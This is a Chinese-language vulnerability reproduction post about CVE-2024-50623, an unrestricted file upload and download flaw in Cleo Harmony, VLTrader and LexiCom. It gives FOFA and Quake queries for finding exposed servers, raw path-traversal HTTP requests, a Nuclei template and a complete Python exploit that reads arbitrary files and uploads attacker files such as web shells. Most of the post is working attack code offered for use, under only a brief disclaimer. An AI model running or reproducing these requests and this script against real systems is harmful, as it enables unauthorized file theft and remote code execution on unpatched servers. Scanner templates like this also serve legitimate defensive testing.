【漏洞复现】CVE-2024-50623

混子Hacker 混子Hacker 2024-12-22 11:22

---

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不承担任何法律及连带责任。

[ 
漏洞简介 
]

——  
鲁莽比懦弱更接近勇敢
  ——

CVE-2024-50623

Cleo LexiCom、VLTransfer 和 Harmony软件中存在不受限制的文件上传和下载漏洞，由于缺乏对上传文件和下载功能的适当验证和限制，攻击者可能利用该漏洞上传恶意文件并可能利用系统的访问/下载功能或其他机制触发恶意文件执行，成功利用该漏洞可能导致远程代码执行，从而造成数据泄露、篡改，甚至进一步的网络攻击

影响范围	Cleo Harmony < 5.8.0.24 Cleo VLTrader < 5.8.0.24 Cleo LexiCom < 5.8.0.24
漏洞评分	8.8‍‍‍‍‍‍‍‍‍‍‍‍‍‍
利用条件	用户认证	无
	利用难度	低
	所需权限	无
解决方案	已发布

---

漏洞信息

混子Hacker

01

资产测绘

fofa: server="Cleo"
Quake：server:"Cleo"

# 风里雨里，我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦，地址 quake.360.net

混子Hacker**

02

漏洞复现

1、访问/Synchronization获取版本信息

GET /Synchronization HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

2、设置请求头VLSync带上版本信息读取配置文件

GET /Synchronization HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Cookie: jSessionId=703gtgoa1qmk3
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.6.0.1;a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\win.ini
Accept-Encoding: gzip

混子Hacker**

03

Nuclei Poc

id: CVE-2024-50623

info:
  name: Cleo - Arbitary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
  reference:
    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
    - https://github.com/watchtowrlabs/CVE-2024-50623
    - https://labs.watchtowr.com/cleo-cve-2024-50623/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-50623
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.10702
  metadata:
    max-request: 2
    shodan-query: 'Server: Cleo'
  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi
  
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(response), "cleo")'
        internal: true
        
    extractors:
      - type: regex
        name: version
        part: header
        internal: true
        regex:
          - "Server: Cleo.*?/([0-9.]+)"
        group: 1
        
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=1337;path=..\..\..\windows\win.ini
        
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

python poc

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                            

        CVE-2024-50623.py
        (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)

          - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2024-50623]  """


import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)

parser = argparse.ArgumentParser(usage="""python CVE-2024-50623 --target http://192.168.1.1/ --action read_or_write --where ..\\..\\pwned.txt --what shell.dll_jsp_xml_txt_zip""", description="Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)")

parser.add_argument("--target", help="Target URL", required=True)
parser.add_argument("--action", help="Action to perform", choices=['write', 'read'], required=True)
parser.add_argument("--where", help="File to write or read", required=True)
parser.add_argument("--what", help="local file to upload", required=False)

args = parser.parse_args()
args.target = args.target.rstrip('/')

s = requests.Session()
s.verify = False

def extract_version(target):
    r = s.get(f"{target}/Synchronization")
    version = r.headers['Server'].split('/')[1].split(' ')[0]
    return version

def read_file(target, where, target_version):
    headers = {
        'VLSync': f"Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={target_version};a=1337;po=1337;s=True;b=False;pp=1337;path={where}"
    }


    r = s.get(f"{target}/Synchronization", headers=headers)
    if(r.status_code == 200):
        print(r.text)
    else:
        print("[ERROR] Failed to read the file")


def write_file(target, where, what, target_version):

    headers = {
        'VLSync': f"ADD;l=Ab1234-RQ0258;n=VLTrader;v={target_version};a=1337;po=1337;s=True;b=False;pp=1337;path={where}"
    }

    r = s.post(f"{target}/Synchronization", headers=headers, data=what)
    if(r.status_code == 200):
        print("[INFO] File written successfully")
    else:
        print("[ERROR] Failed to write the file")




if(args.action == 'read'):
    read_file(args.target, args.where, extract_version(args.target))
elif(args.action == 'write'):
    if(args.what == None):
        print("[ERROR] --what is required for write action")
        exit(1)
    write_file(args.target, args.where, open(args.what,"rb").read(), extract_version(args.target))
else:
    print("[ERROR] Invalid action")
    exit(1)

<<<  
END 

原创文章｜转载请附上原文出处链接

更多漏洞｜关注作者查看

作者｜混子Hacker